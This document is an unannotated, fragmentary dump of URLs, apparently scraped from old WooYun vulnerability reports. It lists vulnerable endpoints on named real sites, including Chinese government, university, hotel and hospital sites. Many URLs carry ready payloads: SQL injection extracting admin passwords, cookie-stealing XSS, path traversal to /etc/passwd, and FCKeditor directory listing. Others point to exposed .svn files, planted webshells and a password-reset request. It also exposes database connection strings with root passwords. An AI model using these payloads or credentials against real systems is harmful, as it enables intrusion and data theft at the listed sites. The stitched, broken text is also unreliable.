http://202.197.107.11:86/vod/vod_List.html?CategoryID=1&type=M http://mail.tdsy.org/vod/vod_List.html?CategoryID=2&type=M http://163.21.191.31/vod/vod_List.html?CategoryID=2&type=M http://urumqiland.gov.cn/searchJSYD.action http://www.bhgzc.com/sys/repdel.asp?id=0 http://www.hhhtgzc.com/sys/repdel.asp?id=0 http://www.kqgzc.com/sys/repdel.asp?id=0 http://sggzccn.cnc506.000pc.net/sys/repdel.asp?id=0 http://www.erdostjgzc.com/sys/repdel.asp?id=0 http://support.cnic.cn/.svn/entries http://support.cnic.cn/afrole/main/loginframe/.svn/entries http://support.cnic.cn/portal/.svn/entries http://support.cnic.cn/mobile/.svn/entries http://www.easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 aihotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 baohonghotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 baolilai-hotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 bmgcn.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 chinameetings.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dehan.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 devpaytmpl3v15.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dgdh.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dggarden.royalhotels.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dgrhm.group.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dzhgz.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 electron.physics.buffalo.edu/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 fhschotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 guangzhougdhhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://www.cscecgc.com/ http://member.stockstar.com/service/kefu/service_kf.asp http://www.chinafoundation.org.cn/search?m=25181 http://www.xaagri.gov.cn/Search.aspx?type=0&key= http://www.qyjyj.cn/Auth_login.action http://zjwyh.cn/fckeditor/editor/filemanager//connectors/test.html http://sjcj.czili.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://data.jmi.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://data.niit.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://sjcj.jsjzi.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://sjcj.czlgj.com/fckeditor/editor/filemanager//connectors/test.html http://sfys.ccit.js.cn/fckeditor/editor/filemanager//connectors/test.html http://www.pjzyy.cn/default.aspx http://pjzyysys.s21.csome.cn/News.aspx?News_ID=232 http://laikeyiliao.com/News.aspx?News_ID=86 http://www.ld-hospital.com/News.aspx?News_ID=276 http://web.fanjinkj.cn/News.aspx?News_ID=3003 http://www.smhc.org.cn/等级:三级甲等 http://www.smhc.org.cn/whir_system/module/security/ezEIP_login.aspx http://www.smhc.org.cn/uploadfiles/2015/04/201504092035513551.aspx http://www.smhc.org.cn/uploadfiles/2015/04/201504092118401840.aspx http://guanli.usth.net.cn/denglu.asp http://xiuxiu.huodong.meitu.com/0408/#rd http://pim.hn165.com/ http://pim.hn165.com/admin/ http://pim.hn165.com http://kyc.synu.edu.cn//UserFiles/File/web.jsp www.jjcgs.com/ArticleView.aspxid=55_ www.jjcgs.com/manager/_ http://tuanwei.web.sdutcm.edu.cn/NoticeView.asp?id=30 http://www.pptv.com/ http://passport.pptv.com/fetchpassword.aspx http://**.**.**/zjsb/login.asp_ http://www.iteye.com/)搜索处存在反射型跨站: http://wooyun.org/bugs/wooyun-2010-090196 http://www.wanche.com.cn/orderdetail/110010-0-0 http://www.wanche.com.cn/orderdetail/110011-0-0 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V http://www.xiaomaow.com/s/index.asp?id=24&a=tgdetails&prodid=21%20union%20select%20%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.gtgw.wang/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://shop.bjpc-link.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,admin,4,5,6,7,8,9%20from%20mall_admin%20%20%16 http://www.idiniu.com/s/index.asp?id=42&a=tgdetails&prodid=41%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.v0755.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.maizfx.com/s/index.asp?id=46&a=tgdetails&prodid=27%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.hunau.edu.cn http://v.cngold.com.cn/results.html?keyword= http://wooyun.org/bugs/wooyun-2015-0102508 http://s.wanda.cn http://s.wanda.cn/mw/mobile/login.html http://s.wanda.cn/Upload/20150410/ASPXSpy-[%E6%B8%A9%E5%B7%9E%E9%BE%99%E6%B9%BE%E4%B8%87%E8%BE%BE%E5%B9%BF%E5%9C%BA-2015410145126681].aspx http://118.145.0.82:2051/gps/login wxb.njcgs.com/readme.txt http://localhost/free/account.php?action=address http://localhost/free/sort.php http://www.okvoice.com/details.php?news_id=308 http://www.fdip.cn http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/browser.htm?Type=Image&Connector=http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://tjdt.tbmmis.com/StateList.aspx https://**.**.**/zhangyijun/autoapp/blob/35ae6a7675b294ec01c8d26d1713db09323a8eee/config.js_ http://**.**.**/confluence/dashboard.action_ http://**.**.**/jira/secure/Dashboard.jspa_ http://**.**.**/redmine/my/page http://www.donvieware.com:8085/servlet/vodsys.MovieList?catid=17 http://125.88.124.147:8085/servlet/vodsys.MovieList?catid=17 http://121.10.252.178:8085/servlet/vodsys.MovieList?catid=17 http://61.189.240.78:8085/servlet/vodsys.MovieList?catid=17 http://183.61.117.164:8085/servlet/vodsys.MovieList?catid=17 http://www.xtszwh.com/aspx/main.html http://eplab.usst.edu.cn/home/nst.php http://www.cnyes.com/ http://www.donvieware.com:8085/servlet/vodsys.useradmin.UserInfor?id=299 http://125.88.124.147:8085/servlet/vodsys.useradmin.UserInfor?id=522 http://121.10.252.178:8085/servlet/vodsys.useradmin.UserInfor?id=348 http://61.189.240.78:8085/servlet/vodsys.useradmin.UserInfor?id=2599 http://183.61.117.164:8085/servlet/vodsys.useradmin.UserInfor?id=2566 http://www.ettoday.net/ http://sdkim.cmge.com/ http://sdkim.cmge.com/login!login.do http://job.super8.com.cn/ https://**.**.**/ucenter/stgl/pwd_question.php https://**.**.**/ucenter/stgl/pwd_question_s.phpnewpwd=admin123&newpwd1=admin123&uid=admin&passwd=&questions=&answer=&step=4&act=forget&lang=1 http://fofa.so/search/result?page=2&q=中科新业网络安全审计系统 http://open.dangdang.com/ http://gim.jlu.edu.cn/yjsy/yzhc/view.jsp?bh=14320 http://mall.cmbchina.com/Search.aspx?keyword=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD+--%3E%27%22%3E%3Ciframe/onload=alert%28document.cookie%29%3E http://job.csdn.net/enterpriselibrary/search http://job.csdn.net/enterpriselibrary/search?keyword=%27 http://www.zjhz.lss.gov.cn/ http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d http://114.251.227.138/login.do http://my.yonyou.com/xmlrpc http://share.fetionyy.com.cn/redmine http://www.601601.com http://xxs.la/AgNpO2 http://hb.dh.jl.cn/admin/login.asp http://hb.dh.jl.cn/home/news/detail.asp?subjectid=017&id=92 http://hb.dh.jl.cn/home/news/index.asp?subjectid=017 http://hb.dh.jl.cn/admin/Extension/news/index.asp?subjectid=001 http://hb.dh.jl.cn/admin/Extension/news/edit.asp?subjectid=001 http://hb.dh.jl.cn/home/bbs/admin/book/qwbm_book.asp?xinb=m http://hb.dh.jl.cn/home/bbs/admin/book/qwbm_book.asp?lei=1 http://hb.dh.jl.cn/admin/user/edit.asp?id=1 http://hb.dh.jl.cn/admin/group/edit.asp?id=1 http://hb.dh.jl.cn/admin/module/edit.asp?id=1 com:10.96.141.73 com:10.100.133.99 http://php.mukewang.com/.svn/entries http://ideone.com/api/1/service.wsdl http://join.qq.com/ http://**.**.**/json_db/other_report.aspxits=3&jq=0&stype=&dfs=0&levels=111 http://www.xsc.lnnu.edu.cn/ http://www.xsc.lnnu.edu.cn/Admin_problem_havebug/,存在注入 http://61.146.213.154/website/approve/approveSiteAction.action http://my.hupu.com/ http://114.251.157.170/admin/frame!loginExc.do http://218.78.241.80/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://jmzx.xmedu.cn:9999/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.gxbyzx.cn:88/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://oa.w12z.com/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.xwgjzx.com:8888/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.dy-fda.gov.cn http://www.dy-fda.gov.cn/admin_z/login.php http://jiaju.loupan.com/space.php?uid=*** http://jiaju.loupan.com/index.php?action/viewcomment/op/delete/itemid/1/cid/369/type/members%20set%20groupid=1%20where%20uid=2047569%23/ismodle/1 http://2.loupan.com/api//20150411020119.php http://218.249.38.206:9191/iot-hmi-web-museum/iot/user/login.jsp http://218.249.38.206:9191/iot-hmi-web-museum/iot/softWareVersion/softWareDownloadPage.action jdbc:mysql://localhost:3306/iotplatform201411?user=root&password=123456&useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://192.168.82.15:3306/iotplatform_bowuguan_20141219?user=root&password=root&useUnicode=true&characterEncoding=UTF-8 http://www.pzhdqedu.gov.cn/mysqladmin/ www.jsyzcgs.com/getjwj.phpop=1_ http://gschool.hebmu.edu.cn/web_admin/ftb.imagegallery.aspx http://yjs.xzmc.edu.cn/web_admin/ftb.imagegallery.aspx http://yjshb.depart.hebust.edu.cn/web_admin/ftb.imagegallery.aspx http://gr.besti.edu.cn/web_admin/ftb.imagegallery.aspx http://yjs.cdutcm.edu.cn/web_admin/ftb.imagegallery.aspx http://60.208.116.173:81/sjyoa/ http://xxx/main.asp http://xxx/systemManagement.asp http://xxx/ConfNetWork.asp http://xxx/SystemInfoForm.asp http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://www.hjcdms.com/portal/root/gcp_data/gg_nr.jsp?id=12681222 http://www.bioknow.cn/portal/root/lims_std/gg_nr.jsp?id=3340763136 http://218.75.123.195:8181/portal/root/lcky1/gg_nr.jsp?id=37486592 http://www.tcmadr.com/portal/root/gcp_data_dzmyy/gg_nr.jsp?id=46825472 http://gzboji-edc.com/portal/root/eip_cro/gg_nr.jsp?id=9109504 http://upload.tjfae.com/Login.aspx http://mss.alxd.com.cn/login.html http://www.langbang.net/default.aspx http://www.jzpsy.cn/WebUser/CheckUserName/?username=1 http://www.gzweining.gov.cn/WebUser/CheckUserName/?username=1 http://xpzmjsz.qswtv.com/WebUser/CheckUserName/?username=1 http://www.gzuce.com/WebUser/CheckUserName/?username=1 http://120.27.54.236:8018/WebUser/CheckUserName/?username=1 http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://tcmadr.com/portal/root/gcp_data_dzmyy/gg_list.jsp?nowlx=欢迎页面 http://molpharm.jiangnan.edu.cn/portal/root/lims_std/gg_list.jsp?nowlx=公告 http://www.bioknow.cn/portal/root/lims_std/gg_list.jsp?nowlx=通知 http://211.69.141.135/portal/root/lims_std/gg_list.jsp?nowlx=通知 http://gzboji-edc.com/portal/root/eip_cro/gg_list.jsp?nowlx=一般公告 http://www.foyoedu.com/ http://xszx.mhedu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://www.dlyzx.edu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://www.tjyfz1.edu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://tygz.mhedu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://222.72.139.155:15580/cjcx/bkxt/xxpj.asp?id=1 http://hxd.4000211929.com/ http://218.78.241.80/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://jmzx.xmedu.cn:9999/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://www.gxbyzx.cn:88/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://oa.w12z.com/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://www.xwgjzx.com:8888/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://202.204.50.16/clientweb/xcus/ic2/ http://202.204.50.16/upload/ http://202.204.50.16/Pages/ic/Report/Main.aspx www.dysga.gov.cn www.dysga.gov.cn/web_manager/ http://i.steelcn.cn/passport/password.aspx http://www.ci.gxnu.edu.cn/fms/Login.aspx http://61.156.3.103:8280/rightmanage/login.jspa http://58.250.192.31/ http://www.capitaledge.cn/Capitaledge/report_findAll.action http://gx.kk3g.net/ http://www.schd.com.cn/web.rar http://media.sisu.edu.cn https://mail.zuche.com/,这个系统有两个安全问题: http://www.invest-zibo.gov.cn:7080/zsj/index.htm http://www.invest-zibo.gov.cn:7080/zsj/download/UserDownload.do http://www.invest-zibo.gov.cn:7080/zsj/download/UserDownload.do http://www.invest-zibo.gov.cn:7080/myname/index.jsp http://www.invest-zibo.gov.cn:7080/myname/wooyun.jsp http://www.kinggolden.com/cn/aboutus.asp?id=4 mobiletsp.com/myaccount.login http://218.60.147.16 http://202.96.63.175/main.aspx http://221.10.252.20/ http://answer.tongyi.com/index.php/question/search?PHPSESSID=640ff09fbb772c41398a6690def6ae0e&k=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&pn=1&subject=0 http://answer.tongyi.com/index.php/question/search?PHPSESSID=640ff09fbb772c41398a6690def6ae0e&k=%E4%BB%A3%E6%95%B0%E5%BC%8F&pn=1&subject=0 http://cq.cits.cn/order/group/041504-8656.html http://cq.cits.cn/order/group/订单号.html http://zeaie.zjedu.org/register.php http://www.metadata.com.cn/ http://59.74.114.252:84/poweb/Ip.do?method=addIp&schoolid=301041 http://219.222.177.236:8080/poweb/Ip.do?method=addIp&schoolid=281041 http://222.29.253.58:8080/poweb/Ip.do?method=addIp&schoolid=011002 http://202.206.242.26:88/poweb/Ip.do?method=addIp&schoolid=171024 http://211.67.126.11:8088/poweb/Ip.do?method=addIp&schoolid=051042 VERSION:1.2.3 www.tadu.com http://www.tadu.com之后看到登陆的地方没有验证码限制 http://www.southsoft.com.cn/ http://gschool.hebmu.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://121.28.142.134:50000/CuteSoft_Client/CuteEditor/Load.ashx http://mbaxy.zjgsu.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://gra.njutcm.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://yjshb.depart.hebust.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://passport.safedog.cn/redirect_to_mail_verify.html?userName=admin http://www.zjportal.net/Pages/Layout/masterpage.htm http://app.cdutetc.cn/index.jsp http://218.60.147.20:8088/index.jsp http://211.162.119.217/Home/Login https://www.tzydb.com/ http://www.locoy.com/member/getpwd.php http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[用户ID]&authstr=[32位加密码 www.locoy.com http://mm.263.com/ http://business.cwnu.edu.cn/shows!queryToIndex.action http://www.bcrj.com.cn/ http://index.gfxy.com/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://reader.library.neusoft.edu.cn/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://proxy.gfxy.com/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://lib.hebau.edu.cn:8080/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://opac.cafa.com.cn:8080/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://www.zxxs.unimip.cn:8086/sms/sendsms.action http://58.67.193.147/ http://**.**.**/_ http://www.fhyx.com/auction/buy.html http://jinma.rixer.cn/ http://pic.cnnb.com.cn/showtheme.php?themeid=125119&columnid=photoclass18 http://222.168.7.148/index.jsp http://222.168.7.148 http://124.133.7.94/article.aspx?articleid=1093 https://mail.qztc.edu.cn/coremail/XJS/index.jsp?sid=BAtnWINNoQUHhxrGpDNNbnFcTBXnQKbD http://221.231.143.11/www/njga/gajz/index.htm http://221.231.143.11/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njfy.gov.cn:8080//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njjg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://njfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njyhfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njygcj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njmg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://njlhqsfj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njjg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njlsxsfj.gov.cn//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njmj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ ftp://202.114.255.27/ http://www.cust.edu.tw/www/post/ezshow3.php?id=6090 http://ttxxhb.nenu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.hanqing.ruc.edu.cn:80/ www.hanqing.ruc.edu.cn http://www.jssports.gov.cn:100/govxxgk/m_5_1/govdiropen/que_chooseusers.jsp http://www.tudou.com/programs/view/wmQHmEEyM4E/ http://www.tudou.com/programs/view/wmQHmEEyM4E/ http://www.njqcnz.net.cn/main/messageadd.action http://www.abwh.gov.cn/scjg/Login.asp http://college.transn.com/ecat/app/index.php?gangwei=&nandu=1&task_id=359ba832ab8926dde6717c32bb14c0f5 www.gxgxw.gov.cn http://bl.wuxi.gov.cn/ http://www.x-rosen.com/pro.php?id=84%27 http://www.chinapnr.com/news/wp-login.php http://edu.transn.com/htdocs/?do=../../../../../etc/passwd%00.jpg http://www.gasmzj.com inurl:edu.cn/zpsys/ http://rszp.scuec.edu.cn/zpsys/uploadfile/file/21434__0035u164f12-utgcrb-i5zt623z-1-i8dgpilb-5yr.jsp http://zhaopin.wmu.edu.cn/zpsys/uploadfile/file/11658539__0034si88-e7arp-i3dwpz0c-1-i8bo0201-85k.jsp http://rszp.gdufs.edu.cn/zpsys/uploadfile/file/null__0035m385d2m-nz1rue-i4z7u5a7-1-i8dh44ov-7ri.jsp http://www.mylib.net/admin/admin_data.asp http://release.changba.com/ http://www.my-et.net/news/?blockid=32 http://rmdhr.safe.gov.cn/ http://60.191.106.201/login.asp http://www.wozhua.mobi/ http://www.essfdc.gov.cn/Article.asp?wzxh=1081 http://www.ltxfdc.com/article.asp?wzxh=1229 http://www.dyfdc.net.cn/Article.asp?wzxh=1826 http://www.wjfdc.gov.cn:81/Article.asp?wzxh=849 http://www.songzishixiao.com/article.asp?wzxh=610 http://ess.enshifdc.com/Article.asp?wzxh=867 www.gongchang.com主站入手 http://www.gongchang.com/robots.txt中泄漏了一个后台路径 http://www.gongchang.com/e/engongchang_admin/ http://zjmooc.worldve.com/Portals/courseAction_getWorldHome.action http://www.naveco.com.cn/.svn/entries http://www.naveco.com.cn/en/.svn/entries http://ouka.naveco.com.cn/.svn/entries http://dealer.naveco.com.cn/.svn/entries http://dealer.naveco.com.cn/en/.svn/entries http://chaoyue.naveco.com.cn/.svn/entries http://workflow.cyou-inc.com/wui/theme/ecology7/page/login.jsp?templateId=1 http://www.gdedu.tv/homePage.action http://www.gdedu.tv/ying.jsp http://www.randstatestats.org/forms.php?cat=1%27 http://www.smarter.com.cn/computers-553/prod-73882721 http://222.68.17.101/ soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetYsqgk soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetYsqgk soapenv:Body soapenv:Envelope http://www.aliued.cn/ http://help.fenxi.cnzz.com/?p=36 http://beian.ncfdj.gov.cn:8080/buildInfo.aspx?certno=20150100 http://beian.ncfdj.gov.cn:8080/building.aspx?page=2&sql=isvalid=1 http://beian.ncfdj.gov.cn:8080/Webbargain/buildInfo.aspx?certno=20150100 http://beian.ncfdj.gov.cn:8080/pub_buildctrl.aspx?buildcode=14225158471001 http://beian.ncfdj.gov.cn:8080/Webbargain/pub_buildctrl.aspxbuildcode=14225158471001 http://beian.ncfdj.gov.cn:8080/Webbargain/building.aspx?page=2&sql=isvalid=1 http://www.ynszxc.gov.cn这个站可以写入权限,看了下爱占网权2pr6果断的提交乌云大大。希望能通过吧。查了一下旁站发现这个http://www.ynszxc.gov.cn:8888这个有漏洞下面是漏洞证明 http://www.ssap.com.cn:80 www.ssap.com.cn kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://gx.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://sc.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://sd.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://ln.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://hai.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://gz.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://fj.kk3g.net/api/newslist.ashx?c=&typeid=57&typelevel=&typename=热闻&w=&AspxAutoDetectCookieSupport=1 http://www.cdb.com.cn/web/Column.asp?ColumnId=18 http://service.ltpop.gov.cn/ http://service.zzxpop.gov.cn/ http://service.zyxpop.gov.cn/ http://service.akpop.gov.cn/ http://service.hsrk.gov.cn/ http://service.ltjsj.gov.cn/ http://service.ltpop.gov.cn/Services/Singleton/cbd1727fbe80c268/0306/610122103203.shtml http://ckx.em.swjtu.edu.cn/news_xiangxi.asp?id=161 http://ckx.em.swjtu.edu.cn/admin/index.asp http://ckx.em.swjtu.edu.cn/news_xiangxi.asp?id=161 http://123.234.41.55/ http://sqlmap.org http://sz.jconline.cn:8080/SzrsOutNet/dynamicView.do?fid=A5C42F1BB9D24C7F8FBDBCABC7FAD2B9 http://www.gzlig.com/ http://gbjt.com.cn/ http://szjfh.com/ http://www.hotata.com/ www.uweb.net.cn http://www.baofen.cn/index.php http://www.baofen.cn www.baofen.cn http://zzb.em.swjtu.edu.cn/html/NewsContent.aspx?NewID=264 http://zzb.em.swjtu.edu.cn/ http://zzb.em.swjtu.edu.cn/html/NewsContent.aspx?NewID=264 http://xj.ac.10086.cn/cas2 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.jcms soapenv:Header/ soapenv:Body web:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string web:wsSyncGetInfos soapenv:Body soapenv:Envelope http://123.yinsha.com/url.php?id=2005020101155734 inurl:depdetail.jsp?depcode= http://gk.tjjh.gov.cn/depdetail.jsp?depcode=BRA25E http://60.28.129.212/depdetail.jsp?depcode=BEA18A http://221.239.20.83/depdetail.jsp?depcode=BKA32B http://gk.tjnk.gov.cn/depdetail.jsp?depcode=BDA05G http://gk.tjhqqzf.gov.cn/depdetail.jsp?depcode=BFA24E http://www.hszxsm.gov.cn:8080/smes/login.action http://www.hszxsm.gov.cn:8080 http://218.2.208.155/website/outWebsite/njsdyyy/getDetails.action http://www.zhunbai.com/forget/index.html http://m.zhuna.cn http://www.zt173.com/admin/info/info.do?method=listPage&columnid=100105 http://www.zt173.com/admin/info/info.do?method=listPage&columnid=100105 www.sjs.com.cn http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://115.238.97.83/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://oa.wnq.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://60.31.196.2/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://qudao.seeyon.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gykghn.com:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://life.ccb-life.com.cn/web/baneConfirm.product?orderId=2000&bizNo=0 http://life.ccb-life.com.cn/web/baneConfirm.product?orderId=240500&bizNo=0 http://appdev.coolyun.com/ylra/loginOutLogin.action http://sl.zhuna.cn/ http://202.193.96.149/ http://202.193.96.168/houqin/houqin/index.php http://www.njfy.gov.cn:8080/courtApp/court/TamTrialManageAction_getTamTrialManageList.action?tamTrialManage.topOrder=-1&tamTrialManage.confirm=-1 